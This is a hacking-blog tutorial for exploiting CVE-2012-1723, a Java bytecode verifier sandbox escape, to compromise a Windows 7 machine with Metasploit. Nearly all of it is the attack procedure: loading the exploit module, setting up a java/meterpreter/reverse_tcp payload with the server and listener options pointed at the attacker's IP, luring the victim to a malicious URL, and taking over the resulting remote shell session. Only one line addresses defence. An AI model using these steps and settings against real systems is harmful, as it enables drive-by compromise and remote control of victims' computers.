Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

Type : Tutorial

Level : Medium

Victim O.S : Windows 7 Ultimate

Attacker O.S : Backtrack 5 R2 with Metasploit Framework v4

CVE : 2012-1723

Credits :    Stefan Cornellius,     # Discoverer
mihi,                  # Vuln analysis
littlelightlittlefire, # metasploit module
juan vazquez,          # merged code (overlapped)
sinn3r                # merged code (overlapped)

Actually I saw this Java Bytecode Verifier Remote Code Execution exploit about 5-6 days ago on exploit database website. It’s very nice exploit btw 😛 with Excellent Ranking. Here I copy from the exploit description.

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Btw this Java Bytecode Verifier Remote Code Execution exploit published on July 11, 2012 so it still fresh 🙂 and the interesting thing was because this is a multi exploit that can affect not only one O.S-es (but I just try only with windows 7). Maybe if you try it with another O.S e.g : linux, mac, etc you can also give your comments here is it work or not.

Requirements :

1. Metasploit Framework with java verifier field access exploit

2. You can download the exploit here http://www.exploit-db.com/exploits/19717/

Step by Step :

Attacker IP Address : 192.168.8.91

Victim IP Address : 192.168.8.90

1. Open your terminal (CTRL+ALT+T) and go to metasploit framework console(msfconsole)

2. Add the Java Bytecode Verifier Remote Code Execution exploit (see image below).

3. The next step you need to set up your payload (if your exploit was successfully executed by victim). Because it’s java exploit, so the payload maybe also will use java, but let see the available payload first.

From the picture above I use the java/meterpreter/reverse_tcp for the payload.

4. The next step after we successfully set up the payload, we also need to set up the exploit switch options to suit our need. To view the available options you can run show options command (or see picture below).

Information :

set srvhost 192.168.8.91 --> set the exploit server ip address

set srvport 80 --> set the exploit server port (because this exploit use browser, 
so we will set it to port 80 or the default web server port)

set uripath "" --> I didn’t set up the URI, just use the original IP address instead.

set lhost 192.168.8.91 --> Set the local ip (attacker ip) in case the exploit 
successfully performed and payload will launched to this ip address

set lport 443 --> Set the local port (attacker port), in which port you want to catch 
the connection from victim

exploit --> perform te exploit (run the server and start the payload)

5. If victim open our malicious URL (http://192.168.8.91) on their browser, here are the screenshot :

I run sessions -l command to list an active sessions, and I got 1 active sessions there.

6. The last step to interact with the available sessions, we use sessions -i 1 (because the ID was 1). Here are the screenshot when I successfully perform the exploit.

pwned…

Countermeasures :

1. Update your JRE to the latest version (update from java was available for this vulnerability).

Hope it’s useful 🙂

You can subscribe to get updates from this website directly on your e-mail.

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found it was useful: